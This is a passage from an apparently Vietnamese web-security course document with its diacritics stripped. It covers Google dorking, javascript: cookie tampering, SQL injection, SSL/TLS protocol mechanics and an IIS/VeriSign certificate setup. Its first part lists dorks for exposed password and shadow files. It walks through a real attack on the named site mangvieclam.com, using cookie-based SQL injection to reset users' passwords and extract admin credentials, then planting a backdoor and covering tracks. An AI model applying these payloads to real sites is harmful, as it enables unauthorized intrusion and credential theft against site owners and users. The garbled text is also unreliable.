a. S dng allinurl:winnt/system32/ (khng c ngoc kp) s lit ktt ccc lin kt n server m cho php truy cp n nhng th mc giihn nh system32 qua web. Nu bn may mn th bn c thc quyntruy cp n file cmd.exe trong th mc system32. Mt khi bn c quyntruy cp n file cmd.exe v c th thc thi n th bn c th tin ln xa hnleo thang quyn ca bn khp server v lm hi n.

b. S dng allinurl:wwwboard/passwd.txt(khng c ngoc kp) trongGoogle search s lit k tt ccc lin kt n server m d b tn cng votnh d b tn cng mt khu WWWBoard. bit thm vtnh d b tncng ny bn c thvo link sau y:http://www.securiteam.com/exploits/2BUQ4S0SAW.html


23/98


23

c. S dng inurl:.bash_history (khng c ngoc kp) s lit k tt ccc linkt n server m cho php truy cp vo file.bash_history qua web. y lmt file lch sdng lnh. File ny bao gm danh sch cc lnh c thc thibi qun trvin, v i khi bao gm cthng tin nhy cm nh mt khu g

vo bi qun trvin. Nu file ny blm hi v nu n bao gm mt khu m ha ca h thng unix (or *nix) th n c th ddng b crack bi phngphp John The Ripper.

d. S dng inurl:config.txt (khng c ngoc kp) s lit k tt ccc lin ktn cc my chcho php truy cp vo file config.txt qua giao din web. Fileny bao gm cc thng tin nhy cm, bao gm gi tr bbm ra ca mt khuqun trv sxc thc quyn truy cp c s d liu. V d: H thng qun l

hc tp Ingenium l mt ng dng Web cho cc h thng Windows pht trinbi Click2learn, Inc. H thng qun l hc tp Ingenium phin bn 5.1 v 6.1lu cc thng tin nhy cm khng an tan trong file config.txt. bit thmthng tin vo lin kt sau:http://www.securiteam.com/securitynews/6M00H2K5PG.html

Nhng tm kim tng tkhc dng inurl: hoc allinurl: kt hp vicc c php khc:inurl:admin filetype:txt

inurl:admin filetype:db

inurl:admin filetype:cfg

inurl:mysql filetype:cfg

inurl:passwd filetype:txt

inurl:iisadmin

inurl:auth_user_file.txt

inurl:orders.txt

inurl:"wwwroot/*."

inurl:adpassword.txtinurl:webeditor.php

inurl:file_upload.php

inurl:gov filetype:xls "restricted"

index of ftp +.mdb allinurl:/cgi-bin/ +mailto

Tm kim cc site hoc server d b tn cng dng intitle: hocallintitle:

a. S dng [allintitle: "index of /root] (khng c ngoc vung) s lit k cc

lin kt n cc webserver(my chWeb) cho php truy cp vo cc th mcgii hn nh root qua giao din web. Th mc ny i khi bao gm cc


24/98


24

thng tin nhy cm m c th ddng tm c tqua nhng yu cu Webn gin.

b. S dng [allintitle: "index of /admin] (khng c ngoc vung) s lit k cc

lin kt n cc website cho php duyt chmc cc th mc gii hn nhadmin qua giao din web. Hu ht cc ng dng web i khi s dng tnnh admin lu quyn admin trong . Th mc ny i khi bao hm ccthng tin nhy cm m c th ddng tm c qua cc yu cu Web ngin.

Nhng tm kim tng tdng intitle: hoc allintitle: kt hp vicc c php khcintitle:"Index of" .sh_history

intitle:"Index of" .bash_history

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" etc/shadow

intitle:"index of" spwd

intitle:"index of" master.passwd

intitle:"index of" htpasswd

intitle:"index of" members OR accountsintitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc

allintitle: restricted filetype :mail

allintitle: restricted filetype:doc site:gov

tm nhng site dbtn cng bng phng php Cross-SitesScripting (XSS):

allinurl:/scripts/cart32.exeallinurl:/CuteNews/show_archives.php

allinurl:/phpinfo.php

tm nhng site dbtn cng bng phng php SQL Injection:allinurl:/privmsg.php

allinurl:/privmsg.php


25/98


25

3. S dng cu lnh JavaScript Inline

Mnh s gii thiu vi cc bn vk thut hack web chdng JavaScript. Vik thut ny, bn c thxem xt v hiu chnh gi tr ca cc cookie hoc

trng n trc tip ngay trn trang web. Tt c chvi mt trnh duyt web htr "debug javascript-inline", chng hn nh Internet Explorer, Netscape hayMozilla, ... C bn v JavaScript-Inline

a scc trnh duyt web u h tr JavaScript-Inline.Bn c ththi hnh JavaScript bng cch g vo thanh URL nh sau:

Code:

javascript:void()

V d:

xem gi tr hin ti ca cookie bn g :Code:

javascript:alert(document.cookie)

Hoc thay i gi tr ca trng n "hiddenid" ca form u tin thnh "2", bng:Code:

javascript:void(document.forms[0].hiddenid.value="2")

M ngun HTML c on nh sau:...

Code:

var a=unescape("%43%4f%44%45%5a");

function check()

{

if (document.a.c.value == a)

{

document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";

}


26/98


26

else

{

alert ("wrong! - letter size?");

}

}

}

n gin bn c th g thng vo thanh URL ca IE nh sau:Code:

javascript:alert(unescape(a)) ly password ca level tip theo("CODEZ")

Realistic mission 8 trn hackthisite.org yu cu bn chuyn 10 triu t tikhon ca "Gary Hunter" vo ti khon "dropCash".Sau khi bn dng SQL-Injection ly username ca "Gary Hunter", bn tinhnh chuyn tin nh sau:

ng nhp vo ti khon ca bn. Trn thanh URL ca IE bn g vo:

Code:javascript:void(document.write('< name="the_" ="movemoney.php" method="post">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" ="">'))

on JavaScript trn s to mt form vi trng nCode:

FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000

By gi bn thay i cookie li nh sau:Code:

javascript:void(document.cookie="accountUsername=G aryWilliamHunter")

javascript:void(document.cookie="accountPassword=G aryWilliamHunter")

n nt "Move Money To A Different Account" mt ci l xong.

Mnh ngh rt c kh nng l mission 8 to mt session("LoggedIn").


27/98


27

Mi ln chng ta ng nhp vo n s t session("LoggedIn")=1. Chng tach cn thay i li gi tr ca cookie v trng n thc hin vic chuyntin trong session ca chng tav n ch kim tra sesion("LoggedIn")=1 m khng kim tra username thc sl ai.

V d cui cng, mnh s trnh by v cch hack trang webhttp://www.mangvieclam.com/..Mnh gi li nhn cho admin ca mangvieclam.com nhng chng thy linlc vi mnh fix li. Hihi, ci "message" ca mnh cui trang index.asptrn mangvieclam.com cha thy ai xa ht.

Sau khi ng nhp vo mangvieclam.com, bn g vo thanh URL dngjavascript:alert(document.cookie) xem cookie.

Ban c th thay i thng tin c nhn ca mt user bt k trnmangvieclam.com bng cch i li cookie username nh sau:javascript:void(document.cookie="username=tn user"), sau chn mc"Cp nhp thng tin"

Bn cng c th thay i password ca mt user bt k trn mangvieclam.comsau khi login vo vi account ca mnh nh sau: chn mc "Thay i mtkhu", g dng javascript:void(document.cookie="username=tnuser"+escape("' or '1'='1")) vo thanh URL, nhp password c l g cng cv password mi, sau n nt "Thay i mt khu".

Li ny nm trong file icl/filerec/detail.asp, dng th 43..65. V d, khi bn setcookie username l "trungkien' or '1'='1", cc cu lnh SQL sau s c thcthi:

Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien'or '1'='1' And Passwords='md5(password c sai)' And Active = 1982 // lun trv true do iu kin or '1'='1' ng mc d password c sai

Update tblUserInfo Set Passwords = 'md5(password mi)' Where UserID ='trungkien' or '1'='1' And Active = 1982 // lun set password mi cho user"trungkien" do iu kin UserID = 'trungkien' ng trc iu kin '1'='1'

Rt tic l li ny khng th khai thc trnLINK :http://www.mangvieclam.com/do li lp trnh.

Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien'

or '1'='1' And Passwords = N'...' And Active = 1982
http://www.mangvieclam.com/http://www.mangvieclam.com/http://www.mangvieclam.com/http://www.mangvieclam.com/


28/98


28

Tuy nhin, websiteLINK :http://www.mangvieclam.com/dng CSDL MS-SQL nn mnh d dng ly c username v password caadmin t tblConfig nh sau:

u tin mnh ly username bngjavascript:void(document.cookie="username="+escape ("' or1=convert(int,(select adminid from tblconfig where accid=1))--"))

Chn mc "Cp nhp thng tin"

Tn ng nhp ca admin l 'ngtuan'

Tng t mnh ly password ca admin bngCode:

javascript:void(document.cookie="username="+escape ("' or1=convert(int,(select adminpass from tblconfig where accid=1))--"))

By gi mnh t li password mi l 'hacked'

HTMLCode:

username:

password:

Upload backdoor v thay i trang index.asp. Sau restore li pasword ccho admin trnh b pht hin:
http://www.mangvieclam.com/http://www.mangvieclam.com/


29/98


29

javascript:void(document.cookie="username="+escape ("';update tblconfig set

adminpass='...' where accid=1--"))

Mt gii php cho mangvieclam.com l bn nn chuyn binRequest.Cookies("UserName") thnh bin phin Session("UserName") trnh b gi mo username nh trn.

4. DDOS: Cha tm hiu

III. Mt scch bo mt cho website

1. SSL(Secure Socket Layer)

1.1 Gii thiu v SSL

Nh chng ta bit c hai giao thc bo mt quan trng lp vn

chuyn (Layer Transport) c tm quan trng cao nht i vi s bo mt ca

cc trnh ng dng trn Web: l hai giao thc SSL v TLS.

Ni chung, c mt s khnng bo v bng mt m lu lng d

liu HTTP. V d, vo nhng nm 1990, tp on CommerceNet xut S-HTTP m vc bn l mt ci tin bo mt ca HTTP. Mt phn thc thi ca

S-HTTP lm cho c sn cng cng trong mt phin bn c chnh sa

ca trnh duyt Mosaic NCSA m nhng ngi dng phi mua (tri vi trnh

duyt Mo NCSA "chun" c sn cng cng v min ph trn Internet).

Tuy nhin, cng thi im Netscape Communication gii thiu SSL

v mt giao thc tng ng vi phin bn u tin ca Netscape Navigator,

Tri vi tp on CommerceNet, Netscape Communications khng tnh ph

cckhch hng ca n v vic thc thi giao thc bo mt ca n. Kt qu,

SSL trthnh giao thc ni bt cung cp cc dch v bo mt cho lu

lng d liu HTTP 1994 v S-HTTP lng l bin mt.

1.2 Cu trc ca giao thc SSL:

Cu trctrc ca SSL v giao thc SSL tng ng c minh ha

trong hnh 1.1(Cu trc SSL v giao thc SSL). Theo hnh ny, SSL m ch

mt lp (bo mt) trung gian gia lp vn chuyn (Transport Layer) v lp


30/98


30

ng dng (Application Layer). SSL c xp lp ln trn mt dch v vn

chuyn nh hng ni kt v ng tin cy, chng hn nh c cung cp

bi TCP. V khnng, n c th cung cp cc dch v bo mt cho cc giao

thc ng dng ty da vo TCP chkhng chHTTP. Thc t, mt uim chnh ca cc giao thc bo mt lp vn chuyn (Transport layer) ni

chung v giao thc SSL ni ring l chng c lp vi ng dng theo ngha l

chng c thc s dng bo v bt k giao thc ng dng c xp

lp ln trn TCP mt cch trong sut. Hnh 1.1 minh ha mt s giao thc

ng dng in hnh bao gm NSIIOP, HTTP, FTP, Telnet, IMAP, IRC, v

POP3. Tt cchng c thc bo v bng cch xp ln chng ln trn

SSL (mu tS c thm vo trong cc tghp giao thc tng ng ch

nh vic s dng SSL). Tuy nhin, ch rng SSL c mt nh hng client-

server mnh mv tht skhng p ng cc yu cu ca cc giao thc

ng dng ngang hng.

Cu trc ca SSL v giao thc SSL

Tm li, giao thc SSL cung cp s bo mt truyn thng vn c ba

c tnh c bn:

1. Cc bn giao tip (ngha l client v server) c thxc thc nhau bng

cch s dng mt m kha chung.


31/98


31

2. Sb mt ca lu lng d liu c bo vv ni kt c m ha

trong sut sau khi mt s thit lp quan hban u v sthng lng kha

session xy ra.

3. Tnh xc thc v tnh ton vn ca lu lng d liu cng c bo vv cc thng bo c xc thc v c kim tra tnh ton vn mt cch

trong sut bng cch s dng MAC.

Tuy nhin, iu quan trng cn lu l SSL khng ngn cc cuc tn cng

phn tch lu lng. V d, bng cch xem xt cc a chIP ngun v ch

khng c m ha v cc s cng TCP, hoc xem xt lng d liu c

truyn, mt ngi phn tch lu lng vn c thxc nh cc bn no ang

tng tc, cc loi dch vang c s dng, v i khi ngay cdnh c

thng tin vcc mi quan h doanh nghip hoc c nhn. Hn na, SSL

khng ngn cc cuc tn cng c nh hng da vo phn thc thi TCP,

chng hn nh cc cuc tn cng lm trn ngp TCP SYN hoc cng ot

session.

s dng s bo v SSL, c client ln server phi bit rng pha bn

kia ang s dng SSL. Ni chung, c ba khnng gii quyt vn ny:

1. S dng cc s cng chuyn dng c dnh ring bi Internet

Asigned Numbers Authority (IANA). Trong trng hp ny, mt s cng ring

bit phi c gn cho mi giao thc ng dng vn s dng SSL.

2. S dng s cng chun cho mi giao thc ng dng v thng

lng cc ty chn bo mt nh l mt phn ca giao thc ng dng .

3. S dng mt ty chn TCP thng lng vic s dng mt giao

thc bo mt, chng hn nh SSL trong sut giai on thit lp ni kt TCP

thng thng.

S thng lng dnh ring cho ng dng ca cc ty chn bo mt

(ngha l khnng thhai) c khuyt im l i hi mi giao thc ng dng

c chnh sa hiu tin trnh thng lng. Ngoi ra, vic xc nh mt


32/98


32

ty chn TCP (ngha l khnng thba) l mt gii php tt, nhng khng

c tho lun nghim tc cho n by gi. Thc t, cc s cng ring bit

c dnh ring v c gn bi IANA cho mi giao thc ng dng vn

c th chy trn SSL hoc TLS (ngha l khnng th nht). Tuy nhin, hych vic s dng cc s cng ring bit cng c khuyt im l i hi hai

ni kt TCP nu client khng bit nhng g m server h tr. Trc tin, client

phi ni kt vi cng an ton v sau vi cng khng an ton hay ngc

li. Rt c thcc giao thc sau ny s hy bphng php ny v tm kh

nng thhai. V d, SALS (Simple Authentication v Security Layer) xc nh

mt ph hp thm s h trxc thc vo cc giao thc ng dng da vo

kt ni. Theo thng s k thut SALS, vic s dng cc c chxc thc c

ththng lng gia client v Server ca mt giao thc ng dng cho .

Cc s cng c gn bi IANA cho cc giao thc ng dng vn chy trn

SSL/TLS c tm tt trong bng 1.2 v c minh ha mt phn trong hnh

1.1. Ngy nay, "S" chnh vic s dng SSL c thm (hu t) nht qun

vo cc tghp ca cc giao thc ng dng tng ng (trong mt s thut

ng ban u, S c s dng v c thm tin t mt cch khng nht

qun v mt s tghp).

Cc s cng c gn bi IANA cho cc giao thc ng dng vn chy

trn SSL/TLS c tm tt trong bng 1.2 v c minh ha mt phn trong

hnh 1.1. Ngy nay, "S" chnh vic s dng SSL c thm (hu t) nht

qun vo cc tghp ca cc giao thc ng dng tng ng (trong mt s

thut ngban u, S c s dng v c thm tin t mt cch khngnht qun v mt s tghp).

1.3 SSL Record Protocol:

SSL Record Protocol nhn d liu tcc giao thc con SSL lp cao hn v

xl vic phn on, nn, xc thc v m ha d liu. Chnh xc hn, giao

thc ny ly mt khi d liu c kch cty lm d liu nhp v ta mt lot


33/98


33

cc on d liu SSL lm d liu xut (hoc cn c gi l cc bn ghi) nh

hn hoc bng 16,383 byte.

Cc bc SSL Record Protocol.

Cc bc khc nhau ca SSL Record Protocol vn i t mt on d liu th

n mt bn ghi SSL Plaintext (bc phn on), SSL Compressed (bc

nn) v SSL Ciphertext (bc m ha) c minh ha trong hnh 1.5. Sau

cng, mi bn ghi SSL cha cc trng thng tin sau y:

- Loi ni dung;


34/98


34

- Sphin bn ca giao thc;

- Chiu di;

- Ti trng d liu (c nn v c m ha ty );

- MAC.Loi ni dung xc nh giao thc lp cao hn vn phi c s dng

sau xl ti trng d liu bn ghi SSL (sau khi gii nn v gii m ha

thchhp).

S phin bn ca giao thc xc nh phin bn SSL ang s dng

(thng l version3.0) Mi ti trng d liu bn ghi SSL c nn v c

m ha theo phng thc nn hin hnh v thng s mt m c xc nh

cho session SSL.

Lc bt u mi session SSL, phng php nn v thng s mt m

thng c xc nh l rng. Chai c xc lp trong sut qu trnh thc

thi ban u SSL Handshake Protocol. Sau cng, MAC c thm vo mi

bn ghi SSL. N cung cp cc dch vxc thc ngun gc thng bo v tnh

ton vn d liu. Tng tnh thut ton m ha, thut ton vn c s

dng tnh v xc nhn MAC c xc nh trong thng s mt m ca

trng thi session hin hnh. Theo mc nh, SSL Record Protocol s dng

mt cu trc MAC vn tng tnhng vn khc vi cu trc HMAC hn. C

ba im khc bit chnh gia cu trc SSL MAC v cu trc HMAC:

Cu trc SSL MAC c mt s chui trong thng bo trc khi hash ngn

cc hnh thc tn cng xem li ring bit.

Cu trc SSL MAC c chiu di bn ghi.Cu trc SSL MAC s dng cc ton t ghp, trong khi cu trc MAC s

dng moduloe cng 2. Tt c nhng im khc bit ny hin hu ch yu v

cu trc SSL MAC c s dng trc cu trc HMAC trong hu nh tt c

thng s k thut giao thc bo mt Internet. Cu trc HMAC cng c s

dng cho thng s k thut giao thc TLS gn y hn.

Nh c minh ha trong hnh 1.5, mt s giao thc con SSL c xp

lp trn SSL Record Protocol. Mi giao thc con c th tham chiu n cc


35/98


35

loi thng bo c th vn c gi bng cch s dng SSL Record Protocol.

Thng s k thut SSL 3.0 xc nh ba giao thc SSL sau y:

- Alert Protocol;

- Handshake Protocol;- ChangeCipherSpec Protocol;

Tm li, SSL Alert Protocol c s dng chuyn cc cnh bo thng qua

SSL Record Protocol. Mi cnh bo gm 2 phn, mt mc cnh bo v mt

m t cnh bo.

SSL Handshake Protocol l giao thc con SSL chnh c s dng h tr

xc thc client v server v trao i mt kha session. Do SSL

Handshake Protocol trnh by tng quan v c tho lun trong phn tip

theo.

Sau cng, SSL ChangeCipherSpec Protocol c s dng thay i gia

mt thng s mt m ny v mt thng s mt m khc. Mc d thng s mt

m thng c thay i cui mt s thit lp quan hSSL, nhng n

cng c thc thay i vo bt k thi im sau .

Ngoi nhng giao thc con SSL ny, mt SSL Application Data Protocol c

s dng chuyn trc tip d liu ng dng n SSL Record Protocol.

SSL Handshake Protocol:

SSL Handshake Protocol l giao thc con SSL chnh c xp lp trn

SSL Record Protocol. Kt qu, cc thng bo thit lp quan h SSL c

cung cp cho lp bn ghi SSL ni chng c bao bc trong mt hoc nhiu

bn ghi SSL vn c xl v c chuyn nh c xc nh bi phngphp nn v thng s mt m ca session SSL hin hnh v cc kha mt

m ca ni kt SSL tng ng. Mc ch ca SSL Handshake Protocol l yu

cu mt client v server thit lp v duy tr thng tin trng thi vn c s

dng bo vcc cuc lin lc. C thhn, giao thc phi yu cu client v

server chp thun mt phin bn giao thc SSL chung, chn phng thc

nn v thng s mt m, ty xc thc nhau v to mt kha mt chnh m


36/98


36

t cc kha session khc nhau dnh cho vic xc thc v m ha thng

bo c thc dn xut t.

Tm li, vic thc thi SSL Handshake Protocol gia mt client C v mt

server S c thc tm tt nh sau (cc thng bo c t trong cc dungoc vung th ty ):

1: C -> S: CLIENTHELLO

2: S -> C: SERVERHELLO

[CERTIFICATE]

[SERVERKEYEXCHANGE]

[CERTIFICATEREQUEST]

SERVERHELLODONE

3: C -> [CERTIFICATE]

CLIENTKEYEXCHANGE

[CERTIFICATEVERIFY]

CHANGECIPHERSPEC

FINISHED

4: S -> C: CHANGECIPHERSPEC

FINISHED

Khi Client C mun kt ni vi server S, n thit lp mt ni kt TCP vi cng

HTTPS (vn khng c a vo phn m t giao thc) v gi mt thng

bo CLIENTHELLO n server bc 1 ca s thc thi SSL Handshake

Protocol. Client cng c th gi mt thng bo CLIENTHELLO nhm phn hi

li mt thng bo HELLOREQUEST hoc ch ng thng lng li cc

tham s bo mt ca mt ni kt hin c. Thng bo CLIENTHELLO bao gmcc trng sau y:

- S ca phin bn SSL cao nht c biu hin bi client (thng l 3.0).

- Mt cu trc ngu nhin do client to ra gm mt tem thi gian 32 bit c

dng UNIX chun v mt gi tr28 byte c to ra bi mt b to s gi

ngu nhin.

- Mt nh danh session m client mun s dng cho ni kt ny.

- Mt danh schcc b mt m client h tr.


37/98


37

- Mt danh sch cc phng php nn m client h tr.

Ch rng trng session identity (nh danh session) nn rng nu sessionSSL hin khng tn ti hoc nu client mun to cc tham s bo mt mi.

mt trong hai trng hp, mt trng session identity khng rng l xc nh

mt session SSL hin c gia client v server (ngha l mt session c cc

tham s bo mt m client mun s dng li.). nh danh session c th bt

ngun t mt ni kt trc , ni kt ny hoc mt ni kt ang hot ng.

Cng ch rng danh sch cc b mt m c h tr, c chuyn t

client n server trong thng bo CLIENTHELLO, cha cc t hp thut ton

mt m c h tr bi client theo th tu tim. Mi b mt m xc nh

mt thut ton trao i kha v mt thng bo mt m. Server s chn mt b

mt m hoc nu cc la chn c th chp nhn c khng c trnh by,

tr v mt thng bo li v ng ni kt mt cch ph hp. Sau khi gi

thng bo CLIENTHELLO, client i mt thng bo SERVERHELLO. Bt k

thng bo khc c tr v bi server ngoi tr mt thng bo

HELLOREQUEST c xem nh l mt li vo thi im ny.

bc 2, server xl thng bo CLIENTHELLO v p ng bng mt thng

bo li hoc thng bo SERVERHELLO. Tng t nh thng bo

CLIENTHELLO, thng bo SERVERHELLO c cc trng sau y:

- Mt sphin bn server cha phin bn thp hn ca phin bn c

ngh bi client trong thng bo CLIENTHELLO v c h tr cao nht bi

Server.

- Mt cu trc ngu nhin do server to ra cng gm mt tem thi gian 32bit

c dng UNIX chun v mt gi tr28bit c to ra bi mt b to s ngu

nhin.

- Mt nh danh session tng ng vi ni kt ny.

- Mt b mt m c chn t bi server tdanh sch cc b mt m c

h tr bi client.


38/98


38

- Mt phng php nn c chn bi server tdanh sch cc thut ton

nn c h tr bi client.

Nu nh danh session trong thng bo CLIENTHELLO khng rng, server

tm trong cache session ca n nhm tm ra mt mc tng hp. Nu mctng hp c tm thy v server mun thit lp ni kt mi bng cch s

dng trng thi session tng ng, server p ng bng cng mt gi trnh

c cung cp bi client. Chn ny l mt session c tip tc li v xc

nh rng c hai pha phi tin hnh trc tip vi cc thng bo

CHANGECIPHERSPEC v FINISHED c trnh by thm bn di. Nu

khng, trng ny cha mt gi trkhc nhn bit mt session mi. Server

cng c th tr v mt trng nh danh session rng biu th rng session

skhng c lu trv do khng thc tip tc sau . Cng ch

rng trong thng bo SERVERHELLO, server chn mt b mt m v mt

phng php nn tcc danh sch c cung cp bi client trong thng bo

CLIENTHELLO. Cc thut ton trao i kha, xc thc, m ha v xc thc

thng bo c xc nh bi bm c chn bi server v c lm l ra

trong thng bo SERVERHELLO. Cc b mt m vn c xc nh trong

giao thc SSL vc bn ging nh b mt m xc nh cho TLS (nh

c tm tt cc bn 1.4 n 1.7 trong nhng bi vit trc).

Ngoi thng bo SERVERHELLO, server cng phi gi cc thng bo khc

n client. V d, nu server s dng s xc thc da vo chng nhn,

server gi chng nhn site ca n n client trong mt thng bo

CERTIFICATE tng ng. Chng nhn phi thch hp cho thut ton trao i

kha ca b mt m c chn v thng l mt chng nhn X.509v3. Cngloi thng bo sc s dng sau cho sp ng ca client i vi

thng bo sc s dng sau cho sp ng ca client i vi thng

bo CERTIFICATERequest ca server. Trong trng hp ca cc chng

nhn X.509v3, mt chng nhn c th thc s tham chiu n ton b mt

chui cc chng nhn, c sp xp theo th t vi chng nhn ca i

tng gi trc tin theo sau l bt k chng nhn CA tin hnh theo trnh t

hng n mt CA gc (vn s c chp nhn bi client).


39/98


39

Tip theo, server c th gi mt thng bo SERVERKEYEXCHANGE n

client nu n khng c chng nhn, mt chng nhn vn c th c s

dng ch xc nhn cc chk k thut s hoc s dng thut ton trao i

kha da vo token FORITEZZA (KEA). R rng, thng bo ny khng cyu cu nu chng nhn site gm mt kha chung RSA vn c thc s

dng trong vic m ha. Ngoi ra, mt server khng nc danh c thty yu

cu mt chng nhn c nhn xc thc client. Do , n gi mt thng bo

CERTIFICATERequest n client. Thng bo ny cha mt danh sch cc

loi chng nhn c yu cu, c phn loi theo th tu tin ca server

cng nh mt danh sch cc tn c phn bit cho cc CA c th chp

nhn. cui bc 2, server gi mt thng bo SERVERHELLODone n

client ch nh s kt thc SERVERHELLO v cc thng bo i km.

Sau khi nhn SERVERHELLO v cc thng bo i km, client xc nhn rng

chng nhn site server (nu c cung cp) l hp lv kim tra nhm bo

m rng cc thng s bo mt c cung cp trong thng bo

SERVERHELLO c th c chp nhn. Nu server yu cu s xc thc

client, client gi mt thng bo CERTIFICATE vn cha mt chng nhn c

nhn cho kha chung ca ngi dng n server bc 3. Tip theo, client

gi mt thng bo CLIENTKEYEXCHANGE c dng ph thuc vo thut ton

cho mi kha c chn bi server:

- Nu RSA c s dng cho vic xc thc server v trao i kha, client to

mt kha mt tin chnh 48 byte, m ha n bng kha chung c tm thy

trong chng nhn site hoc kha RSA tm thi t thng bo

SERVERKEYEXCHANGE v gi kt qu tr v server trong thng boCLIENTKEYEXCHANGE. Ln lt server s dng kha ring tng ng

gii m kha mt chnh.

- Nu cc token FORTEZZA c s dng trao i kha, client dn xut

mt kha m ha token (TEK) bng cch s dng KEA. Php tnh KEA cu

client s dng kha chung t chng nhn server cng vi mt s tham s

ring trong token ca client. Client gi cc tham s chung cn thit cho server

cng to TEK, s dng cc tham s ring ca n. N to mt kha mt


40/98


40

chnh, bao bc n bng cch s dng TEK v gi kt qucng vi mt s

vector khi to n server nh l mt phn ca thng bo

CLIENTKEYEXCHANGE. Ln lt, server c th gii m kha mt chnh mt

cch thch hp. Thut ton trao i kha ny khng c s dng rng ri.Nu s xc thc client c yu cu, client cng gi mt thng bo

CERTIFICATEVERIFY n server. Thng bo ny c s dng cung cp

s xc thc r rng nh danh ca ngi dng da vo chng nhn cc

nhn. N chc gi theo sau mt chng chclient vn c khnng to ch

k (tt c chng nhn ngoi tr cc chng nhn cha cc tham s

DiffeHallman cnh). Sau cng, client hon tt bc 3 bng cch gi mt

thng bo CHANGECIPHERSPEC v mt thng bo FINISHED tng ng

n server. Thng bo FINISHED lun c gi ngay lp tc sau thng bo

CHANGECIPERSPEC xc nhn rng cc tin trnh trao i kha v xc

thc thnh cng. Thc t, thng bo FINISHED l thng bo u tin vn

c bo v bng cc thut ton mi c thng lng v cc kha

session. N chc thc to v c xc nhn nu nhng kha ny c

ci t mt cchph hp chai pha. Khng i hi sbo nhn thng bo

FINISHED; cc pha c th bt u gi d liu c m ha ngay lp tc sau

khi gi thng bo FINISHED. Vic thc thi SSL Handshake Protocol hon

tt bng vic cng yu cu server gi mt thng bo CHANGECIPHERSPEC

v mt thng bo FINISHED tng ng n client bc 4.

Sau khi s thit lp SSL hon tt, mt ni kt an ton c thit lp gia

client v server. Ni kt ny by gic thc s dng gi d liu ng

dng vn c bao bc bi SSL Record Protocol. Chnh xc hn, d liu ngdng c th c phn on, c nn, hoc c m ha v c xc

thc theo SSL Record Protocol cng nh thng tin trng thi session v n i

kt vn by gi c thit lp (ty thuc vic thc thi SSL Handshake

Protocol).

SSL Handshake Protocol c thc rutst ngn nu client v server quyt

nh tip tc li mt session SSL c thit lp trc (v vn c lu

tr) hoc lp li mt session SSL hin c. Trong trng hp ny, chba dng


41/98


41

thng bo v tng cng su thng bo c yu cu. Cc dng thng bo

tng ng c thc tm tt nh sau:

1: C -> S: CLIENTHELLO

2: S -> C: SERVERHELLOCHANECIPHERSPEC

FINISHED

3: S ->C: CHANGECIPHERSPEC

FINISHED

bc 1, client gi mt thng bo CLIENTHELLO n server vn c mt

nh danh session cn c tip tc li. Ln lt server kim tra cache

session ca n tm mt mc tng hp. Nu mt mc tng hp c tm

thy, server mun tip tc li ni kt bn di trng thi session xc nh,

n tr v mt thng bo SERVERHELLO vi cng mt nh danh session

bc 2. Vo thi im ny, c client ln server phi gi cc thng bo

CHANGECIPHERSPEC v FINISHED n nhau bc 2 v 3. Mt khi vic

ti thit lp session hon tt, client v server c th bt u trao i d liu

ng dung.

C chm ha ca SSL:

1. Client pht sinh 1 Session Key ngu nhin khi truy cp n Server

2. Client yu cu Server gi Certificate (gm Public Key ca Server)

3. Client kim tra tnh hp l ca Certificate

4. Nu Certificate ca Server hp l, Client m ha Session Key bng

Public Key ca Server

5. Client gi Session Key m ha cho Server6. Server gii m Session Key c m ha bng Private Key

7. Cc thng tin trao i gia server v client sc m ha v gii m

bng Session Key

Hin nay, khi public mt web site ln internet, p dng c chm haSSLchng ta phi thu SSL Certificate cho Web Server tcc t chc cung cpDigital Certificate nh: Verisign, CyberTrust, EnTrust .Chun b

- My Windows Server 2003


42/98


42

- Cit dch v Internet Information Services (IIS)- Hosting Web Site vi ni dung bt k, truy cp vi achhttp://www.MSOpenLab.com

1.To Request Certificate:- Logon Administrator, m Internet Information Services (IIS) Manager, bungWeb Site, chut phi Default Web Site, chn Properties- Hp thoi Default Web Site Properties, qua tab Directory Security, chnServer Certificate .

Hp thoi Welcome to the Web Server Certificate Wizard, chn Next
http://www.msopenlab.com/http://www.msopenlab.com/


43/98


43

Hp thoi Server Certificate, chn Create anew certificate, chn Next

Trong hp thoi Delayed or Immediate Request, chn Prepare the request now,but send it later, chn Next .


44/98


44

Hp thoi Name and Security Settings, chn Next

Trong hp thoi Organization Information, nhp thng tin nh hnh bn di,chn Next


45/98


45

-Trong hp thoi Your Sites Common Name, nhp www.msopenlab.com vo Common name, chn Next

Hp thoi Geographical Information, nhp thng tin nh hnh bn di, chnNext
http://www.msopenlab.com/http://www.msopenlab.com/


46/98


46

Hp thoi Certificate Request File Name, mc nh ng dn dn

C:\certreg.txt, chn Next .


47/98


47

Hp thoi Request File Summary, chn Next, chn Finish .

Trong hp thoi Default Web Site Properties, chn OK, tt tt c ca s.


48/98


48

2. Xin SSL Certificate t VeriSign.com- M Windows Explorer, copy ni dng ca file C:\certreq.txt

M Internet Explorer, truy cp a chhttp://www.verisign.com, chn Free SSLTrial
http://www.verisign.com/http://www.verisign.com/


49/98


49

Trong ca s Free SSL Trial Certificate, nhp y thng tin (*: thng tinbt buc), chn Continue


50/98


50


51/98


51

Ca s Welcome, chn Continue .

-Ca s tip theo, nhp y thng tin vo phn Technical Contact, chnContinue .


52/98


52

Trong Select Server Platform, chn Microsoft. Trong Select Version, chnIIS 6.0. Dn ni dung file certreq.txt vo Paste Certificate Signing R******(CSR), optained from your server .


53/98


53

Trong What do you plan to use this SSL Certificate for?, chn Web Server,chn Continue


54/98


54

Trong ca s CRS Information, nhp MSOPENLAB vo Challenge Phrasev Re-enter Challenge Phrase. Nhp cu hi bt kvo Reminder Question,chn Continue


55/98


55

Trong ca s Order summary & acceptance, chn Accept


56/98


56

Kim tra: xin SSL Certificate thnh cng


57/98


57

Cu hnh Trusted Root Certification Authority-ng nhp vo hp mail, kim tra nhn c e-mailt [email protected], chn vo link nh trong hnh bn di.
mailto:[email protected]:[email protected]


58/98


58

Trong trang web ca verisign, chn VeriSign CA Certificates


59/98


59

Trong trang web ca verisign, chn VeriSign CA Certificates


60/98


60

Trong ca s Root CA Certificate, chn Select All, copy tt c ni dung


61/98


61

Dn ni dung vo Notepad v save li vi tn ca.cer

